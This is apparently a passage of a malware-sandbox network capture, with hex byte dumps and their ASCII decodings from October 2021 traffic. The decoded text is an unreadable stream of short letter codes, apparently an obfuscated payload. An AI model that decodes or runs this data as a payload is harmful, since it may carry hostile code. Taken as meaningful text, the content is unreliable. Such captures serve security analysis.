                                                                                                Data Ascii: U Mp PM MU UP OU TTn TSO TTM PS Mg PS MT gS TTi TSn ig TTM PS iO iT p Un TTi pM TSO TTM PS Ti PS Pi pO TM U TSO TTM Pi Tp MMp TU TgM TSU Og Tip TTM PS Pi Mp TPU Ui TTi TMn TTU Og iO MM MP Pg Oi UO TTn TSn TTi Mp MSi PS Pi Oi TnM UT nM UU TMp iU PS pS nU O
                                                                                                2021-10-26 15:34:19 UTC44INData Raw: 20 50 53 20 50 69 20 69 4d 20 4d 6e 20 4f 69 20 55 69 20 54 54 69 20 54 4d 67 20 4f 69 20 67 20 4d 6e 20 50 4d 20 70 53 20 54 4d 6e 20 54 50 53 20 54 4d 70 20 6e 53 20 54 67 4d 20 54 55 20 54 55 54 20 4d 4d 20 4d 67 53 20 6e 69 20 4f 53 20 54 67 55 20 54 53 4f 20 54 54 4d 20 50 4d 20 50 50 20 54 4f 53 20 54 4d 4d 20 55 69 20 54 54 69 20 54 54 70 20 70 4f 20 69 69 20 50 53 20 69 55 20 50 70 20 70 4f 20 67 4d 20 54 54 69 20 54 54 6e 20 54 53 67 20 55 53 20 54 4d 53 20 4d 53 20 4d 4d 70 20 69 53 20 54 4d 69 20 54 69 54 20 54 54 6e 20 54 53 4f 20 54 54 55 20 4d 70 20 54 67 4d 20 50 53 20 50 69 20 55 4d 20 4f 53 20 54 54 4f 20 54 53 55 20 54 54 4d 20 50 70 20 4d 67 55 20 4d 4d 20 54 4f 20 54 4d 69 20 70 4d 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 69 54 20 4d 4f
                                                                                                Data Ascii: PS Pi iM Mn Oi Ui TTi TMg Oi g Mn PM pS TMn TPS TMp nS TgM TU TUT MM MgS ni OS TgU TSO TTM PM PP TOS TMM Ui TTi TTp pO ii PS iU Pp pO gM TTi TTn TSg US TMS MS MMp iS TMi TiT TTn TSO TTU Mp TgM PS Pi UM OS TTO TSU TTM Pp MgU MM TO TMi pM TTn TSO TMM iT MO
                                                                                                2021-10-26 15:34:19 UTC45INData Raw: 20 67 67 20 50 69 20 50 67 20 54 4d 69 20 54 69 4d 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 54 55 20 4d 4d 55 20 4d 67 20 4d 67 53 20 6e 69 20 4f 53 20 54 67 55 20 54 53 4f 20 54 54 4d 20 50 4d 20 50 50 20 4d 70 20 54 70 70 20 55 69 20 54 54 69 20 54 54 50 20 54 4d 53 20 4f 67 20 69 70 20 4d 4d 20 50 55 20 67 53 20 54 6e 70 20 54 54 69 20 54 54 6e 20 54 53 67 20 4f 4f 20 50 50 20 67 67 20 50 50 20 50 53 20 50 4f 20 54 4d 4d 20 54 54 70 20 54 53 4f 20 54 4d 4d 20 67 53 20 67 4f 20 4d 50 20 70 53 20 6e 54 20 54 54 55 20 4f 69 20 4d 54 4f 20 54 4d 67 20 4d 50 20 4d 69 4f 20 70 4d 20 4d 4f 20 54 55 4d 20 4f 4f 20 54 54 4d 20 4d 20 54 4d 54 20 50 54 20 69 55 20 50 70 20 67 4d 20 54 6e 53 20 54 54 50 20 54 4d 53 20 54 4d 69 20 54 54 70 20 4d 70 20 50 55 20 50 54
                                                                                                Data Ascii: gg Pi Pg TMi TiM TTn TSO TMM TU MMU Mg MgS ni OS TgU TSO TTM PM PP Mp Tpp Ui TTi TTP TMS Og ip MM PU gS Tnp TTi TTn TSg OO PP gg PP PS PO TMM TTp TSO TMM gS gO MP pS nT TTU Oi MTO TMg MP MiO pM MO TUM OO TTM M TMT PT iU Pp gM TnS TTP TMS TMi TTp Mp PU PT
                                                                                                2021-10-26 15:34:19 UTC47INData Raw: 54 54 6e 20 54 53 4f 20 54 54 55 20 4d 70 20 54 67 4d 20 50 53 20 50 69 20 55 4d 20 4f 53 20 4d 53 20 54 53 4f 20 54 54 4d 20 50 70 20 4d 67 55 20 50 53 20 67 4d 20 54 4d 70 20 54 54 70 20 4f 50 20 6e 4d 20 54 54 67 20 67 69 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 50 55 20 67 4f 20 50 53 20 54 70 20 54 54 70 20 50 69 20 55 69 20 54 54 50 20 54 53 4d 20 4f 67 20 54 54 50 20 50 53 20 4d 54 20 50 53 20 50 69 20 55 69 20 69 4f 20 54 54 6e 20 54 53 4f 20 4f 6e 20 69 55 20 50 54 20 70 50 20 70 54 20 55 50 20 54 54 69 20 54 4d 6e 20 54 54 4d 20 4f 67 20 69 4d 20 4d 4d 20 50 67 20 67 4d 20 50 4f 20 54 4d 70 20 54 54 70 20 54 53 4f 20 54 4d 4d 20 50 67 20 67 4f 20 4f 67 20 50 4f 20 55 50 20 54 54 69 20 54 4d 6e 20 54 53 70 20 54 53 67 20 4f
                                                                                                Data Ascii: TTn TSO TTU Mp TgM PS Pi UM OS MS TSO TTM Pp MgU PS gM TMp TTp OP nM TTg gi iU PS Pi Ui TTi TTn PU gO PS Tp TTp Pi Ui TTP TSM Og TTP PS MT PS Pi Ui iO TTn TSO On iU PT pP pT UP TTi TMn TTM Og iM MM Pg gM PO TMp TTp TSO TMM Pg gO Og PO UP TTi TMn TSp TSg O
                                                                                                2021-10-26 15:34:19 UTC48INData Raw: 6e 20 4d 54 20 4d 70 20 54 4d 4d 20 55 69 20 54 54 69 20 54 4d 6e 20 54 54 6e 20 4f 67 20 69 4d 20 4d 4d 20 50 67 20 4d 4d 20 69 70 20 55 6e 20 54 70 50 20 54 54 50 20 55 55 20 4d 53 50 20 69 55 20 50 53 20 69 55 20 54 4d 69 20 54 4f 55 20 54 54 6e 20 54 53 4f 20 54 54 55 20 4d 70 20 55 54 20 50 53 20 50 69 20 4f 69 20 54 6e 4d 20 54 54 55 20 54 53 4d 20 4f 54 20 4d 54 4d 20 4d 70 20 50 53 20 50 50 20 70 55 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 55 55 20 4f 4d 20 55 69 20 55 70 20 50 54 20 54 53 4f 20 54 54 4d 20 50 54 20 69 67 20 4d 20 50 53 20 55 69 20 4d 67 67 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 54 54 70 20 69 55 20 50 53 20 67 4f 20 69 4d 20 4f 70 20 54 54 70 20 54 53 4f 20 54 4d 4d 20 6e 70 20 67 54 20 50 53 20 50 69
                                                                                                Data Ascii: n MT Mp TMM Ui TTi TMn TTn Og iM MM Pg MM ip Un TpP TTP UU MSP iU PS iU TMi TOU TTn TSO TTU Mp UT PS Pi Oi TnM TTU TSM OT MTM Mp PS PP pU TTi TTn TSO TTM PS iU UU OM Ui Up PT TSO TTM PT ig M PS Ui Mgg TTn TSO TTM TTp iU PS gO iM Op TTp TSO TMM np gT PS Pi
                                                                                                2021-10-26 15:34:19 UTC49INData Raw: 54 4d 20 50 53 20 69 55 20 55 54 20 55 50 20 55 69 20 55 70 20 50 54 20 54 53 4f 20 54 54 4d 20 50 54 20 69 67 20 4d 20 50 53 20 55 69 20 4d 67 67 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 54 54 70 20 69 55 20 50 53 20 67 4f 20 69 4d 20 54 50 55 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 6e 70 20 67 54 20 50 53 20 50 69 20 55 53 20 54 53 54 20 4d 70 20 54 4d 55 20 54 54 4d 20 50 53 20 50 55 20 67 70 20 4d 70 20 70 4f 20 55 69 20 54 54 50 20 54 4f 20 54 50 20 50 53 20 69 55 20 50 69 20 67 69 20 50 4f 20 54 50 70 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 67 53 20 67 4d 20 4d 50 20 50 67 20 4f 69 20 55 4f 20 54 50 4d 20 54 53 6e 20 54 69 20 6e 6e 20 69 55 20 50 53 20 50 53 20 50 4f 20 54 53 4d 20 54 54 70 20 54 53 4f 20 54 4d 4d 20 4d 67 70 20 4d 53 20 4d 67 20 67 53
                                                                                                Data Ascii: TM PS iU UT UP Ui Up PT TSO TTM PT ig M PS Ui Mgg TTn TSO TTM TTp iU PS gO iM TPU TTn TSO TMM np gT PS Pi US TST Mp TMU TTM PS PU gp Mp pO Ui TTP TO TP PS iU Pi gi PO TPp TTn TSO TMM gS gM MP Pg Oi UO TPM TSn Ti nn iU PS PS PO TSM TTp TSO TMM Mgp MS Mg gS
                                                                                                2021-10-26 15:34:19 UTC51INData Raw: 4d 20 4d 70 20 54 70 4f 20 50 53 20 50 69 20 55 4d 20 55 55 20 55 67 20 6e 53 20 54 67 53 20 50 6e 20 53 20 50 69 20 50 69 20 69 4f 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 4d 20 70 70 20 54 53 54 20 55 55 20 54 4d 6e 20 55 70 20 54 55 20 54 4f 50 20 4d 53 20 4d 67 53 20 6e 69 20 4f 53 20 54 67 55 20 54 53 4f 20 54 54 4d 20 50 4d 20 4d 69 20 54 67 69 20 50 69 20 55 69 20 54 54 70 20 54 6e 54 20 4f 55 20 55 70 20 4d 50 20 4d 4d 53 20 4d 70 20 54 4d 4d 20 55 69 20 54 54 69 20 54 4d 6e 20 70 4f 20 54 6e 20 50 53 20 69 55 20 50 70 20 4d 67 4d 20 55 69 20 54 54 4d 20 54 53 55 20 54 4d 53 20 4f 67 20 50 55 20 4d 4d 20 4d 70 20 54 6e 4d 20 55 69 20 54 54 69 20 54 54 50 20 6e 53 20 54 54 50 20 4d 53 20 4d 6e 20 54 4f 70 20
                                                                                                Data Ascii: M Mp TpO PS Pi UM UU Ug nS TgS Pn S Pi Pi iO TTi TTn TSO TTM PS iU PS PM pp TST UU TMn Up TU TOP MS MgS ni OS TgU TSO TTM PM Mi Tgi Pi Ui TTp TnT OU Up MP MMS Mp TMM Ui TTi TMn pO Tn PS iU Pp MgM Ui TTM TSU TMS Og PU MM Mp TnM Ui TTi TTP nS TTP MS Mn TOp
                                                                                                2021-10-26 15:34:19 UTC52INData Raw: 53 4f 20 54 54 55 20 69 6e 20 4d 4f 20 50 70 20 54 70 20 55 67 20 54 53 53 20 4d 67 4f 20 4d 50 20 4d 54 4f 20 50 53 20 69 55 20 50 54 20 4d 55 20 4f 50 20 55 4f 20 54 4d 4f 20 54 54 55 20 70 69 20 50 69 20 69 55 20 54 4d 69 20 50 69 20 55 69 20 54 54 69 20 6e 50 20 54 53 4f 20 54 54 4d 20 67 50 20 6e 55 20 6e 70 20 50 69 20 55 69 20 54 54 55 20 54 54 4f 20 6e 6e 20 4d 4d 50 20 4d 53 20 4d 4d 69 20 69 69 20 67 53 20 54 6e 54 20 54 54 69 20 54 54 6e 20 54 53 6e 20 55 55 20 4d 54 4f 20 69 55 20 50 53 20 70 53 20 54 4d 69 20 4d 54 55 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 69 69 20 4d 4f 20 50 4f 20 54 70 20 55 4d 20 4f 53 20 54 4d 6e 20 54 53 55 20 54 54 4d 20 50 70 20 4d 67 55 20 4d 54 20 70 53 20 54 4d 6e 20 54 67 50 20 55 53 20 70 4f 20 70 53 20 50 53 20
                                                                                                Data Ascii: SO TTU in MO Pp Tp Ug TSS MgO MP MTO PS iU PT MU OP UO TMO TTU pi Pi iU TMi Pi Ui TTi nP TSO TTM gP nU np Pi Ui TTU TTO nn MMP MS MMi ii gS TnT TTi TTn TSn UU MTO iU PS pS TMi MTU TTn TSO TMM ii MO PO Tp UM OS TMn TSU TTM Pp MgU MT pS TMn TgP US pO pS PS
                                                                                                2021-10-26 15:34:19 UTC53INData Raw: 69 55 20 50 4f 20 54 54 54 20 54 54 70 20 54 53 4f 20 54 4d 4d 20 67 54 20 67 4d 20 4d 50 20 50 67 20 4f 69 20 55 4f 20 54 50 50 20 54 4f 20 50 55 20 50 53 20 69 55 20 50 69 20 69 55 20 50 4f 20 54 53 55 20 54 54 70 20 54 53 4f 20 54 4d 4d 20 67 70 20 67 4f 20 67 54 20 50 67 20 54 54 69 20 55 4f 20 54 54 55 20 54 53 4d 20 4f 54 20 50 53 20 50 53 20 54 55 20 54 54 6e 20 54 54 69 20 54 70 4d 20 54 53 6e 20 70 4f 20 54 69 67 20 50 53 20 69 55 20 50 4d 20 69 4f 20 54 4d 69 20 54 53 4f 20 54 54 70 20 54 53 4f 20 54 4d 4d 20 4f 67 20 4d 54 70 20 50 53 20 50 69 20 4f 69 20 54 4d 53 20 54 54 20 67 4f 20 54 54 4d 20 50 53 20 50 4d 20 50 4d 20 55 4f 20 6e 67 20 54 54 50 20 54 54 6e 20 54 53 67 20 4f 67 20 50 6e 20 6e 55 20 54 4d 53 20 50 69 20 55 69 20 54 54 55 20
                                                                                                Data Ascii: iU PO TTT TTp TSO TMM gT gM MP Pg Oi UO TPP TO PU PS iU Pi iU PO TSU TTp TSO TMM gp gO gT Pg TTi UO TTU TSM OT PS PS TU TTn TTi TpM TSn pO Tig PS iU PM iO TMi TSO TTp TSO TMM Og MTp PS Pi Oi TMS TT gO TTM PS PM PM UO ng TTP TTn TSg Og Pn nU TMS Pi Ui TTU
                                                                                                2021-10-26 15:34:19 UTC57INData Raw: 54 70 20 4f 67 20 4f 4d 20 54 54 67 20 50 53 20 50 69 20 4d 70 20 67 69 20 55 50 20 54 54 69 20 54 54 50 20 6e 53 20 55 54 20 54 6e 55 20 54 54 70 20 50 53 20 50 69 20 55 53 20 55 4f 20 4d 67 50 20 54 53 67 20 4f 54 20 54 50 53 20 54 6e 70 20 54 4d 67 20 50 69 20 55 69 20 54 54 55 20 4f 69 20 4d 4d 53 20 54 53 4d 20 4d 70 20 54 50 4d 20 50 53 20 50 69 20 55 4d 20 54 4d 20 4d 67 67 20 54 53 4f 20 54 54 4d 20 50 70 20 54 6e 70 20 54 4d 67 20 50 69 20 55 69 20 54 54 55 20 4f 50 20 54 54 55 20 70 69 20 50 69 20 69 55 20 70 53 20 50 50 20 55 69 20 54 54 69 20 67 6e 20 54 53 4f 20 54 54 4d 20 67 50 20 6e 55 20 54 4d 70 20 50 69 20 55 69 20 54 54 55 20 4f 55 20 50 67 20 54 53 6e 20 67 54 20 50 4f 20 4d 53 20 6e 4d 20 4d 69 20 54 54 69 20 54 54 6e 20 54 53 50 20
                                                                                                Data Ascii: Tp Og OM TTg PS Pi Mp gi UP TTi TTP nS UT TnU TTp PS Pi US UO MgP TSg OT TPS Tnp TMg Pi Ui TTU Oi MMS TSM Mp TPM PS Pi UM TM Mgg TSO TTM Pp Tnp TMg Pi Ui TTU OP TTU pi Pi iU pS PP Ui TTi gn TSO TTM gP nU TMp Pi Ui TTU OU Pg TSn gT PO MS nM Mi TTi TTn TSP
                                                                                                2021-10-26 15:34:19 UTC61INData Raw: 20 4f 67 20 4d 53 20 4d 4d 20 54 55 20 4d 69 53 20 54 4d 69 20 54 70 4d 20 54 53 6e 20 70 4f 20 54 69 67 20 50 53 20 69 55 20 50 4d 20 50 4d 20 6e 67 20 54 53 69 20 55 55 20 54 54 70 20 55 70 20 4f 67 20 54 55 50 20 50 54 20 50 69 20 55 4d 20 4f 20 54 4d 54 20 54 53 4f 20 54 54 4d 20 50 69 20 4d 69 20 54 54 53 20 50 69 20 55 69 20 54 4d 53 20 4f 67 20 4d 54 6e 20 54 54 4d 20 50 53 20 50 69 20 4d 69 20 54 70 20 54 4d 6e 20 54 6e 53 20 55 67 20 6e 53 20 54 69 4f 20 50 53 20 69 55 20 50 53 20 69 55 20 54 4d 70 20 54 54 69 20 54 54 6e 20 54 53 6e 20 4f 53 20 50 53 20 69 55 20 69 4f 20 70 20 4f 69 20 54 54 69 20 4f 50 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 4d 20 54 53 69 20 54 54 50 20 4f 67 20 67 50 20 4d 4d 20 6e 70 20
                                                                                                Data Ascii: Og MS MM TU MiS TMi TpM TSn pO Tig PS iU PM PM ng TSi UU TTp Up Og TUP PT Pi UM O TMT TSO TTM Pi Mi TTS Pi Ui TMS Og MTn TTM PS Pi Mi Tp TMn TnS Ug nS TiO PS iU PS iU TMp TTi TTn TSn OS PS iU iO p Oi TTi OP TSO TTM PS iU PS Pi Ui TTM TSi TTP Og gP MM np
                                                                                                2021-10-26 15:34:19 UTC66INData Raw: 4d 20 50 70 20 54 70 20 70 69 20 4d 4d 20 54 67 4d 20 54 53 55 20 4f 67 20 54 69 70 20 54 54 4d 20 50 53 20 50 69 20 67 4d 20 50 53 20 54 4d 69 20 4d 67 53 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 67 4d 20 50 4d 20 4d 70 20 54 70 67 20 55 69 20 54 54 69 20 54 4d 6e 20 70 4f 20 67 69 20 50 53 20 69 55 20 50 70 20 67 53 20 4d 69 4f 20 54 54 69 20 54 54 6e 20 54 53 67 20 55 55 20 54 67 50 20 69 55 20 50 53 20 69 55 20 70 4f 20 54 54 70 20 4f 55 20 50 67 20 4f 4f 20 50 4d 20 67 67 20 50 4d 20 67 4f 20 55 67 20 4d 50 4d 20 54 4f 69 20 4f 50 20 4d 67 70 20 50 67 20 4f 50 20 55 6e 20 50 69 20 55 69 20 54 4d 53 20 4f 67 20 6e 54 20 54 54 67 20 50 53 20 50 69 20 50 70 20 6e 4d 20 69 54 20 54 54 69 20 54 54 6e 20 54 53 50 20 55 53 20 54 55 69 20 54 6e 20 4d 4d 70 20
                                                                                                Data Ascii: M Pp Tp pi MM TgM TSU Og Tip TTM PS Pi gM PS TMi MgS TTn TSO TMM gM PM Mp Tpg Ui TTi TMn pO gi PS iU Pp gS MiO TTi TTn TSg UU TgP iU PS iU pO TTp OU Pg OO PM gg PM gO Ug MPM TOi OP Mgp Pg OP Un Pi Ui TMS Og nT TTg PS Pi Pp nM iT TTi TTn TSP US TUi Tn MMp
                                                                                                2021-10-26 15:34:19 UTC70INData Raw: 69 20 4d 53 20 54 53 4f 20 54 54 4d 20 67 50 20 50 53 20 67 70 20 54 6e 4d 20 69 50 20 50 55 20 54 54 6e 20 54 53 4f 20 54 54 67 20 70 6e 20 54 4d 53 20 50 53 20 50 69 20 55 50 20 54 53 67 20 55 55 20 6e 69 20 55 70 20 69 55 20 67 4f 20 54 70 55 20 70 70 20 4d 50 50 20 54 54 69 20 54 54 6e 20 54 53 55 20 54 54 53 20 67 54 20 69 70 20 4d 53 20 50 4d 20 6e 70 20 4d 67 4d 20 54 4d 20 67 4d 20 54 54 4d 20 50 53 20 69 4f 20 70 6e 20 54 4d 67 20 55 69 20 54 54 69 20 54 54 70 20 54 4d 4d 20 4f 67 20 67 69 20 4d 4d 20 50 55 20 69 4f 20 55 4d 20 4f 53 20 54 69 4f 20 54 53 4f 20 54 54 4d 20 50 4d 20 4d 70 20 70 4d 20 4d 4f 20 54 67 54 20 54 4d 54 20 4f 69 20 54 69 54 20 54 4d 4d 20 4d 50 20 4d 4d 4d 20 67 67 20 70 20 55 54 20 54 54 69 20 70 67 20 54 53 4f 20 54 54
                                                                                                Data Ascii: i MS TSO TTM gP PS gp TnM iP PU TTn TSO TTg pn TMS PS Pi UP TSg UU ni Up iU gO TpU pp MPP TTi TTn TSU TTS gT ip MS PM np MgM TM gM TTM PS iO pn TMg Ui TTi TTp TMM Og gi MM PU iO UM OS TiO TSO TTM PM Mp pM MO TgT TMT Oi TiT TMM MP MMM gg p UT TTi pg TSO TT
                                                                                                2021-10-26 15:34:19 UTC74INData Raw: 20 4f 50 20 54 54 4f 20 54 4d 67 20 4f 53 20 67 6e 20 4d 70 20 67 67 20 70 20 55 6e 20 54 54 69 20 4d 69 20 54 53 4f 20 54 54 4d 20 50 53 20 55 4f 20 50 53 20 50 69 20 70 4f 20 54 20 50 4f 20 54 53 55 20 54 54 4d 20 50 70 20 67 4f 20 67 54 20 67 4f 20 54 54 69 20 54 54 70 20 54 53 55 20 4d 20 70 67 20 50 54 20 69 55 20 50 70 20 67 50 20 54 4d 54 20 54 4d 67 20 55 67 20 54 53 70 20 4f 4d 20 67 69 20 4d 6e 20 50 4d 20 70 53 20 54 4d 6e 20 54 50 4f 20 54 4d 70 20 6e 53 20 54 67 67 20 50 67 20 4f 50 20 4f 55 20 50 50 20 55 69 20 54 4d 53 20 4f 69 20 54 53 55 20 54 53 53 20 69 6e 20 4d 4f 20 50 4d 20 54 70 20 4f 4d 20 4f 69 20 54 4d 53 20 6e 53 20 54 54 50 20 70 4d 20 4d 6e 20 4d 53 4d 20 70 4d 20 50 4f 20 67 50 20 54 54 70 20 54 53 4f 20 54 4d 4d 20 4d 50 20
                                                                                                Data Ascii: OP TTO TMg OS gn Mp gg p Un TTi Mi TSO TTM PS UO PS Pi pO T PO TSU TTM Pp gO gT gO TTi TTp TSU M pg PT iU Pp gP TMT TMg Ug TSp OM gi Mn PM pS TMn TPO TMp nS Tgg Pg OP OU PP Ui TMS Oi TSU TSS in MO PM Tp OM Oi TMS nS TTP pM Mn MSM pM PO gP TTp TSO TMM MP
                                                                                                2021-10-26 15:34:19 UTC78INData Raw: 55 69 20 54 67 50 20 55 53 20 69 4f 20 4d 53 20 54 4f 20 55 20 4d 54 20 55 69 20 55 70 20 55 6e 20 55 67 20 50 53 20 4d 67 70 20 54 54 4f 20 4d 4d 20 67 55 20 50 53 20 69 55 20 50 69 20 69 53 20 54 4d 54 20 6e 70 20 55 67 20 54 54 54 20 54 54 20 54 53 54 20 69 55 20 50 53 20 50 53 20 6e 4d 20 4f 50 20 70 70 20 6e 50 20 55 53 20 54 54 4f 20 54 55 4d 20 4d 50 53 20 55 6e 20 50 53 20 4d 67 20 54 4f 20 54 54 20 4d 54 20 55 6e 20 55 70 20 55 6e 20 55 53 20 50 53 20 4d 67 20 54 53 4f 20 70 69 20 55 70 20 4d 53 20 54 70 20 4d 54 53 20 4d 50 69 20 70 55 20 6e 50 20 54 4f 20 55 20 4d 4d 20 55 69 20 55 50 20 55 6e 20 55 53 20 50 53 20 4d 67 20 54 4f 20 55 20 54 53 4d 20 67 53 20 67 6e 20 4d 53 20 67 4d 20 6e 54 20 54 54 4f 20 4f 69 20 67 50 20 54 4d 4d 20 54 53 20
                                                                                                Data Ascii: Ui TgP US iO MS TO U MT Ui Up Un Ug PS Mgp TTO MM gU PS iU Pi iS TMT np Ug TTT TT TST iU PS PS nM OP pp nP US TTO TUM MPS Un PS Mg TO TT MT Un Up Un US PS Mg TSO pi Up MS Tp MTS MPi pU nP TO U MM Ui UP Un US PS Mg TO U TSM gS gn MS gM nT TTO Oi gP TMM TS
                                                                                                2021-10-26 15:34:19 UTC80INData Raw: 53 20 50 67 20 54 53 53 20 54 4d 53 20 54 54 6e 20 4f 55 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 55 20 54 54 55 20 54 53 69 20 67 54 20 50 50 20 4d 53 20 67 53 20 4d 4d 50 20 54 54 69 20 54 54 6e 20 54 53 6e 20 4f 53 20 4d 53 20 4d 6e 20 54 4f 6e 20 50 69 20 6e 54 20 70 70 20 54 54 67 20 54 53 4f 20 6e 55 20 50 54 20 69 55 20 50 53 20 4f 53 20 55 69 20 54 54 69 20 54 53 53 20 6e 6e 20 4d 53 50 20 50 53 20 69 55 20 50 53 20 70 4f 20 4f 67 20 54 54 50 20 54 54 6e 20 54 53 6e 20 54 53 6e 20 67 54 20 54 54 4f 20 4d 53 20 67 67 20 6e 6e 20 4f 50 20 70 53 20 6e 50 20 54 54 55 20 67 70 20 70 6e 20 4f 6e 20 50 50 20 55 69 20 54 4d 53 20 4f 55 20 70 69 20 69 4f 20 4d 53 20 50 69 20 67 6e 20 54 54 54 20 70 70 20 4f 69 20 6e 4d
                                                                                                Data Ascii: S Pg TSS TMS TTn OU TTM PS iU PS Pi Ui TTi TTU TTU TSi gT PP MS gS MMP TTi TTn TSn OS MS Mn TOn Pi nT pp TTg TSO nU PT iU PS OS Ui TTi TSS nn MSP PS iU PS pO Og TTP TTn TSn TSn gT TTO MS gg nn OP pS nP TTU gp pn On PP Ui TMS OU pi iO MS Pi gn TTT pp Oi nM
                                                                                                2021-10-26 15:34:19 UTC84INData Raw: 4f 20 54 4d 69 20 4f 55 20 54 54 69 20 70 69 20 54 6e 50 20 67 67 20 70 53 20 69 70 20 6e 50 20 69 4d 20 4d 67 4d 20 54 4d 69 20 54 4d 70 20 70 50 20 54 53 54 20 50 54 20 50 69 20 4f 69 20 54 4d 53 20 54 54 50 20 54 4d 70 20 55 53 20 4d 67 4f 20 4d 67 67 20 69 55 20 50 69 20 55 69 20 54 54 4d 20 55 50 20 54 69 55 20 67 70 20 54 4f 53 20 67 54 20 55 67 20 69 4f 20 50 67 20 4f 6e 20 54 4d 4d 20 54 4d 69 20 54 4d 6e 20 54 55 20 50 20 55 50 20 4d 53 54 20 54 54 6e 20 54 4f 20 54 53 4d 20 4f 55 20 54 69 20 54 53 69 20 69 55 20 50 53 20 50 53 20 50 4f 20 54 54 50 20 54 54 70 20 54 53 4f 20 54 54 55 20 67 50 20 70 67 20 55 55 20 55 4f 20 4d 20 54 54 50 20 54 54 6e 20 54 53 67 20 54 69 20 54 53 50 20 69 55 20 50 53 20 50 53 20 54 4d 53 20 54 4d 70 20 54 54 20 50
                                                                                                Data Ascii: O TMi OU TTi pi TnP gg pS ip nP iM MgM TMi TMp pP TST PT Pi Oi TMS TTP TMp US MgO Mgg iU Pi Ui TTM UP TiU gp TOS gT Ug iO Pg On TMM TMi TMn TU P UP MST TTn TO TSM OU Ti TSi iU PS PS PO TTP TTp TSO TTU gP pg UU UO M TTP TTn TSg Ti TSP iU PS PS TMS TMp TT P
                                                                                                2021-10-26 15:34:19 UTC88INData Raw: 20 6e 70 20 55 6e 20 4d 50 50 20 55 6e 20 54 53 4f 20 54 54 4d 20 50 54 20 67 6e 20 67 54 20 70 4d 20 54 54 69 20 54 53 53 20 54 53 50 20 70 69 20 54 54 55 20 4d 53 20 4d 6e 20 50 4d 20 70 53 20 54 4d 6e 20 54 67 4d 20 54 4d 70 20 6e 53 20 54 54 4d 20 69 55 20 6e 50 20 55 53 20 50 69 20 55 69 20 54 54 55 20 54 54 50 20 54 53 70 20 54 54 50 20 4f 67 20 54 53 55 20 50 54 20 50 69 20 4f 69 20 54 53 67 20 55 55 20 54 53 6e 20 55 70 20 50 55 20 4d 55 20 67 55 20 4d 4f 20 55 6e 20 54 4d 70 20 4f 69 20 54 69 4f 20 54 54 4f 20 50 55 20 54 53 69 20 50 6e 20 50 67 20 4f 4d 20 69 67 20 54 67 4f 20 54 53 4d 20 54 54 67 20 50 53 20 50 54 20 67 70 20 70 20 54 67 54 20 54 54 6e 20 54 54 50 20 4d 4d 6e 20 4d 50 20 4d 55 20 67 50 20 50 67 20 54 55 6e 20 54 54 55 20 54 54
                                                                                                Data Ascii: np Un MPP Un TSO TTM PT gn gT pM TTi TSS TSP pi TTU MS Mn PM pS TMn TgM TMp nS TTM iU nP US Pi Ui TTU TTP TSp TTP Og TSU PT Pi Oi TSg UU TSn Up PU MU gU MO Un TMp Oi TiO TTO PU TSi Pn Pg OM ig TgO TSM TTg PS PT gp p TgT TTn TTP MMn MP MU gP Pg TUn TTU TT
                                                                                                2021-10-26 15:34:19 UTC92INData Raw: 4d 53 20 4d 55 20 4d 54 4d 20 50 4f 20 54 54 6e 20 54 53 4f 20 54 54 70 20 4d 50 20 4d 53 53 20 50 53 20 50 69 20 55 69 20 54 53 50 20 70 4f 20 54 54 53 20 54 54 4d 20 54 55 70 20 69 55 20 50 53 20 50 69 20 67 50 20 54 54 69 20 54 54 6e 20 54 4d 69 20 54 54 69 20 67 70 20 54 6e 53 20 6e 53 20 54 50 6e 20 55 69 20 54 54 69 20 54 54 70 20 54 4d 4d 20 4f 67 20 67 6e 20 4d 4d 20 69 55 20 67 67 20 4d 53 70 20 54 54 20 55 50 20 54 53 4f 20 54 54 4d 20 50 54 20 70 50 20 54 55 20 50 69 20 55 69 20 54 54 50 20 4f 70 20 70 69 20 54 4d 54 20 4d 53 20 50 69 20 67 53 20 54 4d 50 20 54 4d 6e 20 54 54 70 20 54 4d 70 20 6e 53 20 54 50 54 20 50 70 20 4d 6e 20 54 4f 4f 20 69 4f 20 54 4d 69 20 4d 67 67 20 54 54 6e 20 54 53 4f 20 54 54 55 20 69 4d 20 4d 4f 20 50 6e 20 54 70
                                                                                                Data Ascii: MS MU MTM PO TTn TSO TTp MP MSS PS Pi Ui TSP pO TTS TTM TUp iU PS Pi gP TTi TTn TMi TTi gp TnS nS TPn Ui TTi TTp TMM Og gn MM iU gg MSp TT UP TSO TTM PT pP TU Pi Ui TTP Op pi TMT MS Pi gS TMP TMn TTp TMp nS TPT Pp Mn TOO iO TMi Mgg TTn TSO TTU iM MO Pn Tp
                                                                                                2021-10-26 15:34:19 UTC96INData Raw: 4d 20 55 6e 20 54 54 53 20 55 55 20 54 54 53 20 55 70 20 4d 53 20 4d 70 20 6e 4f 20 55 55 20 55 69 20 54 54 69 20 54 54 67 20 6e 53 20 54 67 70 20 50 53 20 69 55 20 50 53 20 69 50 20 54 53 53 20 54 54 67 20 54 54 6e 20 67 55 20 54 54 4d 20 50 53 20 69 55 20 54 4f 20 50 69 20 55 69 20 4f 4f 20 54 54 4f 20 4d 4d 20 67 53 20 50 53 20 69 55 20 50 69 20 67 50 20 54 4d 54 20 54 4d 67 20 55 67 20 54 53 70 20 55 55 20 54 55 6e 20 69 55 20 50 53 20 70 53 20 54 4d 6e 20 54 54 67 20 54 4d 70 20 6e 53 20 54 67 67 20 69 55 20 6e 50 20 4f 4d 20 50 69 20 55 69 20 54 54 55 20 54 54 55 20 4d 20 4d 50 4d 20 50 53 20 69 55 20 50 70 20 4d 70 20 70 50 20 54 54 4d 20 54 69 20 67 20 54 54 4d 20 50 53 20 50 4d 20 69 4f 20 55 4f 20 4d 54 6e 20 54 54 69 20 54 54 6e 20 54 53 67 20
